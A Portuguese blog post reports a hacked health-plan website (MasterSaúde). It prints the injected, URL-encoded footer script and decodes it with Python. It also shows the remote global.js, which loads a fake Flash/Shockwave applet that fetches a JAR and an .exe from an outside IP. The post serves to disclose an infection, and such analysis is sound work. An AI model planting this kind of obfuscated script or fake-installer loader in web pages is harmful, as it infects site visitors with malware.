Início > Sites > Site da MasterSaúde hackeado.

Site da MasterSaúde hackeado.

Hoje aconteceu algo curioso.

Estava eu fazendo pesquisas em sites de planos de saúde, quando entro no site da MasterSaúde (http://www.mastersaude.com.br), recebo uma mensagem que não possuo o Flash Player instalado, veja na figura:

site_mastersaude

WTF?? Tenho instalado o Flash Player, o que será?

Peguei o código fonte e dei uma vasculhada, mandei o pro Miguel di Ciurcio Filho (http://osysadmin.blogspot.com) pois ele já havia descoberto um worm no site da Vivo, então ele achou no rodapé o seguinte código:

<script type=”text/javascript”>
<!­­
document.write(unescape(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”))
// ­­>
</script>

Descodificando com o Python:

imPython 2.6.2 (release26­maint, Apr 19 2009, 01:56:41)
[GCC 4.3.3] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import urllib
>>>
urllib.unquote(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”)
‘<script type=”text/javascript”
src=”http://204.3.156.246/js/global.js”></script>&#8217;

Conteúdo do arquivo global.js:

/* Setar IP atual logo abaixo */
var url = “204.3.156.246”;
document.write(‘<applet name=”Seu Computador não possui Adobe Shockwave
Player clique em RUN para proseguir ­ ©Adobe Shockwave Player Version
11.5.0.600″ code=”Main.class” archive=”http://&#8217; + url +
‘/js/FlashPlayer.jar” height=”10″ width=”1″><param name=”link”
value=”http://&#8217; + url + ‘/js/install_flash_player_ax.exe”></applet>’);

Eeeeeta… site hackeado…

Categorias:Sites
  1. Nenhum comentário ainda.
  1. No trackbacks yet.

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: